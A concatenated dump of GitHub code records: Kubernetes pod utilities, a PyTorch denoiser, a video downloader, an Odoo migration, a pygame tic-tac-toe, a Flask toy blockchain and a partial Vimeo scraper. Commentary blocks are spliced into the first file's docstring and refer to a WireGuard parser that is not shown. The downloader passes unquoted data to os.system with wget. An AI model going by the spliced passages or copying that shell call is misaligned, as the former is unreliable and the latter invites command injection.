api_instance: a CoreV1Api instance\n :param pod_name: the name of the Pod to exec this command on\n :param namespace: the namespace this Pod is running in\n :param container_name: the container name of this Pod\n :param command: command as List[str]\n :param run_async: run this command async\n :return: the result output as str\n \"\"\"\n if run_async:\n resp = api_instance.connect_get_namespaced_pod_exec(\n pod_name,\n namespace,\n container=container_name,\n command=command,\n stderr=False,\n stdin=False,\n stdout=False,\n tty=False,\n async_req=True,\n )\n else:\n resp = k8s.stream.stream(\n api_instance.connect_get_namespaced_pod_exec,\n pod_name,\n namespace,\n container=container_name,\n command=command,\n stderr=True,\n stdin=False,\n stdout=True,\n tty=False,\n )\n if not run_async:\n logger.debug(\"Response: \" + resp)\n return resp\n\n\ndef get_deployment_of_pod(\n api_instance: k8s.client.AppsV1Api, pod_name: str, namespace: str\n) -> k8s.client.V1Deployment:\n \"\"\"\n Return a 
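# --- Illustrative aside (not part of the original source) ---
# Example input/output for read_wireguard_config above. The field names are
# typical WireGuard keys chosen for illustration, not taken from this repo.
_sample = """
[Interface]
PrivateKey = abc123=
Address = 192.168.99.1/32

[Peer]
PublicKey = def456=
AllowedIPs = 0.0.0.0/0
"""
# read_wireguard_config(_sample) would return (as a defaultdict):
# {
#     "Interface.PrivateKey": "abc123=",
#     "Interface.Address": "192.168.99.1/32",
#     "Peer.PublicKey": "def456=",
#     "Peer.AllowedIPs": "0.0.0.0/0",
# }
# Note each value keeps any trailing "=" because the line is split on the
# first "=" only (split("=", 1)).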
Deployment of a Pod by its name\n :param api_instance: instance of k8s.client.AppsV1Api\n :param pod_name: name of the Pod\n :return: k8s.client.V1Deployment of the Pod\n \"\"\"\n deployment_name = pod_name.rsplit(\"-\", 2)[0]\n return api_instance.read_namespaced_deployment(deployment_name, namespace=namespace)\n\n\ndef get_all_probes(container: k8s.client.V1Container) -> List[k8s.client.V1Probe]:\n probes = []\n if container.startup_probe:\n probes.append(container.startup_probe)\n if container.readiness_probe:\n probes.append(container.readiness_probe)\n if container.liveness_probe:\n probes.append(container.liveness_probe)\n return probes\n\n\ndef check_probe_compatibility(probe: k8s.client.V1Probe) -> bool:\n \"\"\"\n Check if this type of probe is compatible with Gefyra Carrier\n :param probe: instance of k8s.client.V1Probe\n :return: bool if this is compatible\n \"\"\"\n if probe is None:\n return True\n elif probe._exec:\n # exec is not supported\n return False\n elif probe.tcp_socket:\n # tcp sockets are not yet supported\n return False\n elif probe.http_get:\n return True\n else:\n return True\n","repo_name":"ar4s-dev/gefyra","sub_path":"operator/gefyra/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"41108728257","text":"from PIL import Image\nimport matplotlib.pyplot as plt\n\nimport torchvision.transforms as transforms\nimport torch\nimport numpy as np\nfrom ConvDenoiser import ConvDenoiser\n\n\ndef show_img(source, new):\n source = source[0].detach().numpy()\n source = np.transpose(source, (1, 2, 0))\n new = new[0].detach().numpy()\n new = np.transpose(new, (1, 2, 0))\n\n fig, axes = plt.subplots(nrows=1, ncols=2, sharex=True,\n sharey=True, figsize=(25, 4))\n axes[0].imshow(source)\n axes[1].imshow(new)\n plt.show()\n\n\nif __name__ == '__main__':\n print(\"denoise a single image\")\n\n img_path = \"test.png\"\n model_path = \"trained_model.pt\"\n\n image = Image.open(img_path).convert('RGB')\n in_transform = transforms.Compose([\n transforms.Resize(ConvDenoiser.INPUT_SIZE),\n transforms.ToTensor()\n ])\n\n image = in_transform(image)\n image = image.unsqueeze(0)\n\n model = ConvDenoiser()\n model.load_state_dict(torch.load(model_path))\n\n is_cuda = torch.cuda.is_available()\n\n model.eval()\n output = model(image)\n\n show_img(image, output)\n","repo_name":"FabienDanieau/pytorch_autoencoder","sub_path":"denoise.py","file_name":"denoise.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19471718724","text":"import os\nimport json\nimport requests\n\nerrors = []\nwith open(\"output.json\", \"rb\") as f:\n content = f.read()\n json_data = json.loads(content)\n for video_id in json_data:\n video_url = \"https://s3-us-west-1.amazonaws.com/workout-generator-exercises/originals/\" + video_id + \".mp4\"\n os.system('wget ' + video_url)\n","repo_name":"slobdell/light-api","sub_path":"light_api/scripts/download_originals.py","file_name":"download_originals.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"34202486817","text":"from PyQt5.QtWidgets import QWidget, QMainWindow\nfrom ..command import Command\nfrom .interpolation import bilinear_interpolation, nearest_neighbor_interpolation\nfrom pycture.dialogs import ScaleDialog\nfrom pycture.editor import 
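# --- Illustrative aside (not part of the original source) ---
# get_deployment_of_pod above derives the Deployment name from the usual
# <deployment>-<replicaset-hash>-<pod-suffix> naming scheme, so stripping
# the last two dash-separated segments recovers it:
assert "my-app-7c9d54f5b8-x2x9q".rsplit("-", 2)[0] == "my-app"
# This is a heuristic: it misfires for bare Pods, StatefulSet pods, or any
# name that does not carry exactly those two generated suffixes.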
Editor\n\n\nclass Scale(Command):\n def __init__(self, parent: QWidget):\n super().__init__(parent, \"Scale\")\n self.interpolation_techniques = {\n \"Nearest neighbour\": nearest_neighbor_interpolation,\n \"Bilinear\": bilinear_interpolation,\n }\n\n def execute(self, main_window: QMainWindow):\n self.main_window = main_window\n dialog = ScaleDialog(main_window, main_window.get_editor_list(), list(self.interpolation_techniques.keys()))\n dialog.set_editor(main_window.get_active_editor_name())\n dialog.set_interpolation_technique(\n list(self.interpolation_techniques.keys())[0])\n\n dialog.applied.connect(self.apply_scale)\n\n def apply_scale(self, \n editor_title: str, interpolation_name: str, new_size: (int, int)\n ):\n editor = self.main_window.get_editor(editor_title)\n image = editor.get_image()\n title = editor.windowTitle()\n \n interpolation_technique = self.interpolation_techniques[interpolation_name]\n scaled_image = image.scale(new_size, interpolation_technique)\n self.main_window.add_editor(editor=Editor(\n self.main_window, scaled_image, title + ' scaled'))\n","repo_name":"miguel-martinr/Pycture","sub_path":"src/pycture/commands/edit_commands/scale.py","file_name":"scale.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32594539320","text":"import json\nimport logging\n\nfrom odoo import SUPERUSER_ID, api\n\n_logger = logging.getLogger(\"shopfloor.\" + __name__)\n\n\ndef _compute_logs_new_values(env):\n log_entries = env[\"shopfloor.log\"].search([])\n for entry in log_entries:\n new_vals = {}\n for fname in (\"params\", \"headers\", \"result\"):\n if not entry[fname]:\n continue\n # make it json-like\n replace_map = [\n (\"{'\", '{\"'),\n (\"'}\", '\"}'),\n (\"':\", '\":'),\n (\": '\", ': \"'),\n (\"',\", '\",'),\n (\", '\", ', \"'),\n (\"False\", \"false\"),\n (\"True\", \"true\"),\n (\"None\", \"null\"),\n (\"\\\\xa0\", \" \"),\n ]\n json_val = entry[fname]\n for to_replace, replace_with in replace_map:\n json_val = json_val.replace(to_replace, replace_with)\n try:\n val = json.loads(json_val)\n except Exception:\n # fail gracefully and do not break the whole thing\n # just for not being able to convert a value.\n # We don't use these values as json yet, no harm.\n _logger.warning(\n \"`%s` JSON convert failed for record %d\", fname, entry.id\n )\n else:\n new_vals[fname] = json.dumps(val, indent=4, sort_keys=True)\n if entry.error and not entry.exception_name:\n exception_details = _get_exception_details(entry)\n if exception_details:\n new_vals.update(exception_details)\n entry.write(new_vals)\n\n\ndef _get_exception_details(entry):\n for line in reversed(entry.error.splitlines()):\n if \"Error:\" in line:\n name, msg = line.split(\":\", 1)\n return {\n \"exception_name\": name.strip(),\n \"exception_message\": msg.strip(\"() \"),\n }\n\n\ndef migrate(cr, version):\n env = api.Environment(cr, SUPERUSER_ID, {})\n _compute_logs_new_values(env)\n","repo_name":"nguyenductamlhp/servermns","sub_path":"addons/wms/shopfloor/migrations/13.0.1.2.0/post-migration.py","file_name":"post-migration.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13299648141","text":"from typing import List\n\n\nclass Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n toReturn = \"\"\n # Get shortest word\n shortestWord = min(strs, key=len)\n\n # Return word if array has one 
item\n if len(strs) == 1:\n return strs[0]\n\n # Go through the letters of the shortest word\n for i in range(len(shortestWord)):\n \n # If all words in strs start with sub-array 0:i+1 from shortest word, update to return and go next\n if all(list(map(lambda x: x.startswith(shortestWord[0:i+1]), strs))):\n toReturn = shortestWord[0:i+1]\n # Else, break and return what we have\n else:\n break\n\n return toReturn\n\n\nsol = Solution()\nprint(sol.longestCommonPrefix([\"flower\",\"flow\",\"flight\"]))","repo_name":"AbuZaitoun/LeetCode","sub_path":"longestCommonPrefix.py","file_name":"longestCommonPrefix.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35196533367","text":"from turtle import *\n\nbgcolor('black')\ncolor('cyan')\nspeed(20)\nright(45)\n\nfor i in range(155):\n 
circle(30)\n if 7 0.5):\n print(new_sentence, '는 {:.2f} % 확률로 존댓말입니다.'.format(score * 100))\n else:\n print(new_sentence, '는 {:.2f} % 확률로 반말입니다.'.format((1 - score) * 100))\n\n# =============================================================\ndo_predict('이렇게 말했나요?')\ndo_predict('이렇게 말하지요')\ndo_predict('이렇게 말해보세요')\ndo_predict('이렇게 말한 거에요')\ndo_predict('이렇게 말하지 마시오')\ndo_predict('이렇게 말하죠')\ndo_predict('이렇게 말했죠')\n\n# =============================================================\n# 정리 중\n# https://docs.google.com/spreadsheets/d/17OxKDrjJH6KJs_J-Ng0AsvaZXp6svhGdKIjEbLP0Xhw/edit#gid=0\n\n'''\n\n한글만 남기기: 이렇게 말했나요 \n토큰화: ['이렇', '게', '말하', '었', '나요']\n불용어 제거: ['이렇', '게', '말하', '었', '나요']\n정수 인코딩: [[3446, 25, 1, 1, 1]]\n패딩: [[ 0 0 0 0 0 0 0 0 0 0 3446 25 1 1 1]]\n이렇게 말했나요? 는 88.07 % 확률로 반말입니다.\n\n한글만 남기기: 이렇게 말하지요\n토큰화: ['이렇', '게', '말하', '지요']\n불용어 제거: ['이렇', '게', '말하', '지요']\n정수 인코딩: [[3446, 25, 1, 1]]\n패딩: [[ 0 0 0 0 0 0 0 0 0 0 0 3446 25 1 1]]\n이렇게 말하지요 는 94.75 % 확률로 반말입니다.\n\n한글만 남기기: 이렇게 말해보세요\n토큰화: ['이렇', '게', '말하', '어', '보', '세요']\n불용어 제거: ['이렇', '게', '말하', '보', '세요']\n정수 인코딩: [[3446, 25, 1, 1, 385, 3216]]\n패딩: [[ 0 0 0 0 0 0 0 0 0 3446 25 1 1 385 3216]]\n이렇게 말해보세요 는 68.63 % 확률로 반말입니다.\n\n한글만 남기기: 이렇게 말한 거에요\n토큰화: ['이렇', '게', '말', '하', 'ㄴ', '거', '에', '요']\n불용어 제거: ['이렇', '게', '말', 'ㄴ', '거', '요']\n정수 인코딩: [[3446, 25, 26, 1, 1, 2, 1, 7]]\n패딩: [[ 0 0 0 0 0 0 0 3446 25 26 1 1 2 1 7]]\n이렇게 말한 거에요 는 100.00 % 확률로 존댓말입니다.\n\n한글만 남기기: 이렇게 말하지 마시오\n토큰화: ['이렇', '게', '말하', '지', '마시', '오']\n불용어 제거: ['이렇', '게', '말하', '지', '마시']\n정수 인코딩: [[3446, 25, 1, 155, 1, 1]]\n패딩: [[ 0 0 0 0 0 0 0 0 0 3446 25 1 155 1 1]]\n이렇게 말하지 마시오 는 94.38 % 확률로 반말입니다.\n\n한글만 남기기: 이렇게 말하죠\n토큰화: ['이렇', '게', '말하', '죠']\n불용어 제거: ['이렇', '게', '말하', '죠']\n정수 인코딩: [[3446, 25, 1, 453]]\n패딩: [[ 0 0 0 0 0 0 0 0 0 0 0 3446 25 1 453]]\n이렇게 말하죠 는 97.83 % 확률로 존댓말입니다.\n\n한글만 남기기: 이렇게 말했죠\n토큰화: ['이렇', '게', '말하', '었', '죠']\n불용어 제거: ['이렇', '게', '말하', '었', '죠']\n정수 인코딩: [[3446, 25, 1, 1, 453]]\n패딩: [[ 0 0 0 0 0 0 0 0 0 0 3446 25 1 1 453]]\n이렇게 말했죠 는 98.92 % 확률로 존댓말입니다.\n\n'''","repo_name":"YoungriKIM/Classify_up_down_text","sub_path":"YUGYO Machine/p_06_preprocessing_check.py","file_name":"p_06_preprocessing_check.py","file_ext":"py","file_size_in_byte":5251,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39682420491","text":"import sys\r\nimport numpy as np\r\nimport pygame\r\n\r\nBACKGROUND_COLOR = (80, 133, 199)\r\nLINE_COLOR = (80, 160, 199)\r\nLINE_WIDTH = 10\r\nB_WIDTH = 600\r\nB_HEIGHT = 600\r\nB_ROWS = 3\r\nB_COlS = 3\r\nCIRCLE_RAD = 60\r\nCIRCLE_WIDTH = 15\r\nCIRCLE_COLOR = (239, 231, 200)\r\nCROSS_WIDTH = 25\r\nCROSS_COLOR = (66, 66, 66)\r\nSPACE = 55\r\nSQUARE_SIZE = 200\r\nSCREEN_WIDTH = B_COlS * SQUARE_SIZE\r\nSCREEN_HEIGHT = B_ROWS * SQUARE_SIZE\r\n\r\n\r\n\r\nclass Game:\r\n def __init__(self):\r\n # initializing pygame\r\n pygame.init()\r\n self.play_background_music()\r\n self.surface = pygame.display.set_mode(size=(B_WIDTH, 100 + B_HEIGHT))\r\n # Change the color of the background\r\n pygame.display.set_caption('TIC TAC TOE')\r\n self.surface.fill(BACKGROUND_COLOR)\r\n self.draw_lines()\r\n self.board = np.zeros((B_ROWS, B_COlS))\r\n pygame.display.flip()\r\n\r\n # Plays continouse music\r\n def play_background_music(self):\r\n pygame.mixer.music.load(\"Resources/Tic Tac Toe Glow OST.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n # Play only once\r\n def play_sound(self, sound):\r\n sound = pygame.mixer.Sound(f\"Resources/{sound}.mp3\")\r\n 
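# Build a one-shot sound effect from the Resources folder; pygame.init() above has already initialized the mixer, so the clip can play immediately.\r\n 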
pygame.mixer.Sound.play(sound)\r\n\r\n def render_background(self):\r\n self.surface = pygame.display.set_mode(size=(B_WIDTH, B_HEIGHT))\r\n # Change the color of the background\r\n pygame.display.set_caption('TIC TAC TOE')\r\n self.surface.fill(BACKGROUND_COLOR)\r\n pygame.display.flip()\r\n\r\n ####### Check Board statuses #######\r\n def mark_square(self, row_n, col_n, player):\r\n self.board[row_n][col_n] = player\r\n\r\n def is_square_available(self, row_n, col_n):\r\n return self.board[row_n][col_n] == 0\r\n\r\n def is_board_full(self):\r\n for row in range(B_ROWS):\r\n for col in range(B_COlS):\r\n if self.board[row][col] == 0:\r\n return False\r\n return True\r\n\r\n ######### Playing Game ##########\r\n def play_game(self):\r\n win = False\r\n running = True\r\n player = 1\r\n while running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN and not win:\r\n # rounding click coordinates down to board slots\r\n mouseX_colval = int(event.pos[0] // SQUARE_SIZE)\r\n mouseY_rowval = int(event.pos[1] // SQUARE_SIZE)\r\n\r\n if self.is_square_available(mouseY_rowval, mouseX_colval):\r\n self.mark_square(mouseY_rowval, mouseX_colval, player)\r\n\r\n if self.check_win(player):\r\n self.show_game_over(player)\r\n win = True\r\n elif np.count_nonzero(self.board) == 9:\r\n self.show_board_full()\r\n player = player % 2 + 1\r\n self.draw_figures(self.board)\r\n pygame.display.flip()\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_RETURN:\r\n pygame.mixer.music.unpause()\r\n self.reset()\r\n win = False\r\n\r\n if event.key == pygame.K_ESCAPE:\r\n exit(0)\r\n\r\n # pygame.display.update()\r\n\r\n ########### Drawing Lines, Crosses and Circles ##########\r\n def draw_lines(self):\r\n for i in range(1, 4):\r\n # Horizontal Lines\r\n pygame.draw.line(self.surface, LINE_COLOR, (0, SQUARE_SIZE * i), (B_WIDTH, SQUARE_SIZE * i), LINE_WIDTH)\r\n # Vertical Lines\r\n pygame.draw.line(self.surface, LINE_COLOR, (SQUARE_SIZE * i, 0), (SQUARE_SIZE * i, B_HEIGHT), LINE_WIDTH)\r\n\r\n def draw_figures(self, board):\r\n for row in range(B_ROWS):\r\n for col in range(B_COlS):\r\n if board[row][col] == 1:\r\n pygame.draw.circle(self.surface, CIRCLE_COLOR, (\r\n int(col * SQUARE_SIZE + SQUARE_SIZE / 2), int(row * SQUARE_SIZE + SQUARE_SIZE / 2)), CIRCLE_RAD,\r\n CIRCLE_WIDTH)\r\n elif board[row][col] == 2:\r\n pygame.draw.line(self.surface, CROSS_COLOR, (col * SQUARE_SIZE + SPACE, row * SQUARE_SIZE + SPACE), (col * SQUARE_SIZE + SQUARE_SIZE - SPACE, row * SQUARE_SIZE + SQUARE_SIZE - SPACE), CROSS_WIDTH)\r\n pygame.draw.line(self.surface, CROSS_COLOR, (col * SQUARE_SIZE + SPACE, row * SQUARE_SIZE + SQUARE_SIZE - SPACE), (col * SQUARE_SIZE + SQUARE_SIZE - SPACE, row * SQUARE_SIZE + SPACE), CROSS_WIDTH)\r\n\r\n ######### Check Winning and Draw Lines #########\r\n def check_win(self, player):\r\n ver_win = self.check_vertical_win(player)\r\n hor_win = self.check_horizontal_win(player)\r\n diag_win = self.check_diagonal_win(player)\r\n pygame.display.flip()\r\n\r\n if ver_win or hor_win or diag_win:\r\n return True\r\n else:\r\n return False\r\n\r\n def check_vertical_win(self, player):\r\n for col in range(B_COlS):\r\n if self.board[0][col] == player and self.board[1][col] == player and self.board[2][col] == player:\r\n self.draw_vertical_winning_line(col, player)\r\n return True\r\n\r\n return False\r\n\r\n def check_horizontal_win(self, player):\r\n for row in range(B_ROWS):\r\n if self.board[row][0] == player and self.board[row][1] == 
player and self.board[row][2] == player:\r\n self.draw_horizontal_winning_line(row, player)\r\n return True\r\n\r\n return False\r\n\r\n def check_diagonal_win(self, player):\r\n if self.board[0][0] == player and self.board[1][1] == player and self.board[2][2] == player:\r\n self.draw_diagonal_winning_line(player)\r\n return True\r\n elif self.board[2][0] == player and self.board[1][1] == player and self.board[0][2] == player:\r\n self.draw_diagonal_winning_line(player, False)\r\n return True\r\n else:\r\n return False\r\n\r\n def draw_vertical_winning_line(self, col, player):\r\n posX = col * SQUARE_SIZE + SQUARE_SIZE / 2\r\n\r\n if player == 1:\r\n pygame.draw.line(self.surface, CIRCLE_COLOR, (posX, 10), (posX, SCREEN_HEIGHT - 10), CIRCLE_WIDTH)\r\n else:\r\n pygame.draw.line(self.surface, CROSS_COLOR, (posX, 10), (posX, SCREEN_HEIGHT - 10), CIRCLE_WIDTH)\r\n\r\n def draw_horizontal_winning_line(self, row, player):\r\n posY = row * SQUARE_SIZE + SQUARE_SIZE / 2\r\n\r\n if player == 1:\r\n pygame.draw.line(self.surface, CIRCLE_COLOR, (10, posY), (SCREEN_WIDTH - 10, posY), CIRCLE_WIDTH)\r\n else:\r\n pygame.draw.line(self.surface, CROSS_COLOR, (10, posY), (SCREEN_WIDTH - 10, posY), CIRCLE_WIDTH)\r\n\r\n def draw_diagonal_winning_line(self, player, down_diag=True):\r\n if down_diag:\r\n if player == 1:\r\n pygame.draw.line(self.surface, CIRCLE_COLOR, (25, 25), (SCREEN_WIDTH - 25, SCREEN_HEIGHT - 25), CROSS_WIDTH)\r\n else:\r\n pygame.draw.line(self.surface, CROSS_COLOR, (25, 25), (SCREEN_WIDTH - 25, SCREEN_HEIGHT - 25), CROSS_WIDTH)\r\n else:\r\n if player == 1:\r\n pygame.draw.line(self.surface, CIRCLE_COLOR, (25, SCREEN_HEIGHT - 25), (SCREEN_WIDTH - 25, 25), CROSS_WIDTH)\r\n else:\r\n pygame.draw.line(self.surface, CROSS_COLOR, (25, SCREEN_HEIGHT - 25), (SCREEN_WIDTH - 25, 25), CROSS_WIDTH)\r\n\r\n def reset(self):\r\n self.surface.fill(BACKGROUND_COLOR)\r\n self.draw_lines()\r\n self.board = np.zeros((B_ROWS, B_COlS))\r\n pygame.display.flip()\r\n self.play_game()\r\n\r\n def show_game_over(self, player):\r\n font = pygame.font.SysFont('arial', 20)\r\n if player == 1:\r\n ln1 = font.render(\"Game is over! Player O won the game\", True, (250, 250, 250))\r\n elif player == 2:\r\n ln1 = font.render(\"Game is over! Player X won the game\", True, (250, 250, 250))\r\n self.surface.blit(ln1, (10, 610))\r\n ln2 = font.render(\"To play again press Enter. To exit press Esc!\", True, (250, 250, 250))\r\n self.surface.blit(ln2, (10, 650))\r\n pygame.display.flip()\r\n pygame.mixer.music.pause()\r\n self.play_sound(\"game-over-sound-effect\")\r\n\r\n def show_board_full(self):\r\n font = pygame.font.SysFont('arial', 20)\r\n ln1 = font.render(\"You're out of moves...\", True, (250, 250, 250))\r\n self.surface.blit(ln1, (10, 630))\r\n ln2 = font.render(\"To play again press Enter. 
To exit press Esc!\", True, (250, 250, 250))\r\n self.surface.blit(ln2, (10, 650))\r\n pygame.display.flip()\r\n pygame.mixer.music.pause()\r\n self.play_sound(\"game-over-sound-effect\")\r\n\r\nif __name__ == '__main__':\r\n game = Game()\r\n game.play_game()\r\n","repo_name":"sandunijayasundara/Tic_Tac_Toe","sub_path":"Tic_Tac_Toe.py","file_name":"Tic_Tac_Toe.py","file_ext":"py","file_size_in_byte":8998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71178442932","text":"lucky_numbers = [4, 8, 15, 16, 23, 42, 7]\nfriends = [\"Alfred\", \"John\", \"Jim\", \"Nike\", \"Mike\", \"James\", \"Jorge\"]\nprint(friends) # just print the friends list\nfriends.extend(lucky_numbers) # adding the objects of the lucky_numbers list at the end of the friends list\nprint(friends) # because of the previous command (friends.extend(lucky_numbers)) the list will be printed together with the lucky_numbers list in sequence\nfriends.append(\"New\") # it will add the string \"New\" at the current end of the list\nfriends.insert(1, \"Ben\") # it will add the string \"Ben\" at index 1 (the string \"John\" and the others will be pushed to the right) ; friends.insert(index, object)\nfriends.remove(\"James\") # it will remove the string \"James\" from the list\nfriends.pop() # it will remove the last object from the list (in this case the string \"New\")\nprint(friends.index(\"Nike\")) # shows whether the object is in the list (if it is not, an error is raised) and at what index the string \"Nike\" is\nfriends.clear() # remove all the objects from the list\nfriends = [\"Alfred\", \"John\", \"Jim\", \"Jorge\", \"Nike\", \"Mike\", \"James\", \"Jorge\"] # just to rebuild with 2 strings \"Jorge\" (there is nothing new here)\nprint(friends.count(\"Jorge\")) # it will print the number of objects equal to \"Jorge\"\nfriends.sort() # it will sort the list in ascending order (in this case it will be the same as alphabetical order)\nlucky_numbers.sort() # it will sort the list in ascending order (in this case it will be the same as numerical order)\nlucky_numbers.reverse() # it will reverse the list\nfriends2 = friends.copy() # create a copy of the friends list (with the same elements)","repo_name":"bruniculos08/Python-freeCodeCamp","sub_path":"Part10.py","file_name":"Part10.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74915334131","text":"import hashlib\nfrom uuid import uuid4\nimport json\nfrom time import time\n\nfrom flask import Flask, jsonify, request\n\n\nclass Blockchain(object):\n def __init__(self):\n self.chain = []\n self.current_transactions = []\n\n # create the genesis (first) block\n self.new_block(previous_hash=1, proof=100)\n\n def new_block(self, proof, previous_hash=None):\n \"\"\"\n Create a new Block in the Blockchain\n :param proof: The proof given by the Proof of Work algorithm\n :param previous_hash: (Optional) Hash of previous Block\n :return: New Block\n \"\"\"\n\n block = {\n 'index': len(self.chain) + 1,\n 'timestamp': time(),\n 'transactions': self.current_transactions,\n 'proof': proof,\n 'previous_hash': previous_hash or self.hash(self.chain[-1]),\n }\n\n # Reset the current list of transactions\n self.current_transactions = []\n\n self.chain.append(block)\n return block\n\n def new_transaction(self, sender, 
recipient, amount):\n \"\"\"\n Creates a new transaction to go into the next mined Block\n :param sender: Address of the Sender\n :param recipient: Address of the Recipient\n :param amount: Amount\n :return: The index of the Block that will hold this transaction\n \"\"\"\n\n self.current_transactions.append({\n 'sender': sender,\n 'recipient': recipient,\n 'amount': amount,\n })\n\n return self.last_block['index'] + 1\n\n @staticmethod\n def hash(block):\n # Hashes a Block\n \"\"\"\n Creates a SHA-256 hash of a Block\n :param block: Block\n :return: The SHA-256 hash as a hexadecimal string\n \"\"\"\n\n # We must make sure that the Dictionary is Ordered, or we'll have inconsistent hashes\n block_string = json.dumps(block, sort_keys=True).encode()\n return hashlib.sha256(block_string).hexdigest()\n\n @property\n def last_block(self):\n # Returns the last Block in the chain\n return self.chain[-1]\n\n @staticmethod\n def valid_proof(last_proof, proof):\n \"\"\"\n Validates the Proof: Does hash(last_proof, proof) contain 4 leading zeroes?\n :param last_proof: Previous Proof\n :param proof: Current Proof\n :return: True if correct, False if not.\n \"\"\"\n\n guess = f'{last_proof}{proof}'.encode()\n guess_hash = hashlib.sha256(guess).hexdigest()\n return guess_hash[:4] == \"0000\"\n\n def proof_of_work(self, last_proof):\n \"\"\"\n Simple Proof of Work Algorithm:\n - Find a number p' such that hash(pp') contains leading 4 zeroes, where p is the previous p'\n - p is the previous proof, and p' is the new proof\n :param last_proof: Previous Proof\n :return: A proof such that valid_proof(last_proof, proof) is True\n \"\"\"\n\n proof = 0\n while self.valid_proof(last_proof, proof) is False:\n proof += 1\n\n return proof\n\napp = Flask(__name__)\n\n# create a unique uuid for this node\nnode_identifier = str(uuid4()).replace('-', '')\n\n# initialize the blockchain\nblockchain = Blockchain()\n\n@app.route('/mine', methods=['GET'])\ndef mine():\n last_block = blockchain.last_block\n last_proof = last_block['proof']\n proof = blockchain.proof_of_work(last_proof)\n\n # we must receive a reward for finding the proof.\n # sender is 0 to show that this node has mined a new coin.\n blockchain.new_transaction(\n sender = \"0\",\n recipient = node_identifier,\n amount = 1\n )\n\n # Forge the new Block by adding it to the full chain\n previous_hash = blockchain.hash(last_block)\n block = blockchain.new_block(proof, previous_hash)\n\n response = {\n 'message': \"New Block Forged\",\n 'index': block['index'],\n 'transactions': block['transactions'],\n 'proof': block['proof'],\n 'previous_hash': block['previous_hash'],\n }\n\n return jsonify(response), 200\n\n@app.route('/transactions/new', methods=['POST'])\ndef new_transaction():\n values = request.get_json()\n\n required = ['sender', 'recipient', 'amount']\n if not all(k in values for k in required):\n return 'Missing values', 400\n\n index = blockchain.new_transaction(values['sender'], values['recipient'], values['amount'])\n\n response = {\"message\": f'Transaction will be added to Block {index}'}\n\n return jsonify(response), 201\n\n@app.route('/chain', methods=['GET'])\ndef full_chain():\n response = {\n \"chain\": blockchain.chain,\n \"length\": len(blockchain.chain)\n }\n return jsonify(response), 200\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', port=5000)\n","repo_name":"zhongeric/mhacks12","sub_path":"blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"1867360826","text":"# LCM of the primes (BOJ 21919)\nimport 
sys\nimport math\n\nN = int(sys.stdin.readline())\nelems = set(list(map(int, sys.stdin.readline().split())))\n\ndef is_prime(e):\n for i in range(2, int(math.sqrt(e))+1):\n if e % i == 0:\n return False\n return True\n\nprimes = []\nprime_lcm = 1\nfor e in elems:\n if is_prime(e):\n primes.append(e)\n prime_lcm *= e\n\nif len(primes) > 0:\n print(prime_lcm)\nelse:\n print(-1)\n","repo_name":"watchstep/TIS-python","sub_path":"BAEKJOON/silver3/21919.py","file_name":"21919.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18604677922","text":"from .html import *\nfrom .utils import *\nimport vimeo_dl as vimeo\nimport random\nimport vlc\n#import time\n\ndef store_vimeo_urls(birds):\n for bird in birds.index:\n print('Getting vimeo links: {:s}'.format(bird))\n filename = get_filename(bird, 'video') + '.txt'\n if os.path.exists(filename):\n continue\n vimeo = get_vimeo_urls(bird)\n if isinstance(vimeo, list):\n save_urls(bird, vimeo, 'video')\n\ndef get_vimeo_urls(bird):\n url = get_bird_url(bird) + 'id/'\n page = get_page(url)\n soup = get_soup(page)\n\n # =========================================\n # Find a link to the media-browser page\n # =========================================\n stop_bool = True\n links = soup.findAll('a')\n for link in links:\n try:\n href = link['href']\n media = 'media-browser' in href\n guide = href[:7] == '/guide/'\n if media and guide:\n ending = href.split('/')[-1]\n if len(ending) == 6:\n url = href\n stop_bool = False\n break\n except:\n continue\n\n # =========================================\n # Boolean check if there were any videos\n # =========================================\n if stop_bool:\n print('No videos for {:s}'.format(bird))\n return\n\n # =========================================\n # Get the content on the media-browser page\n # and find the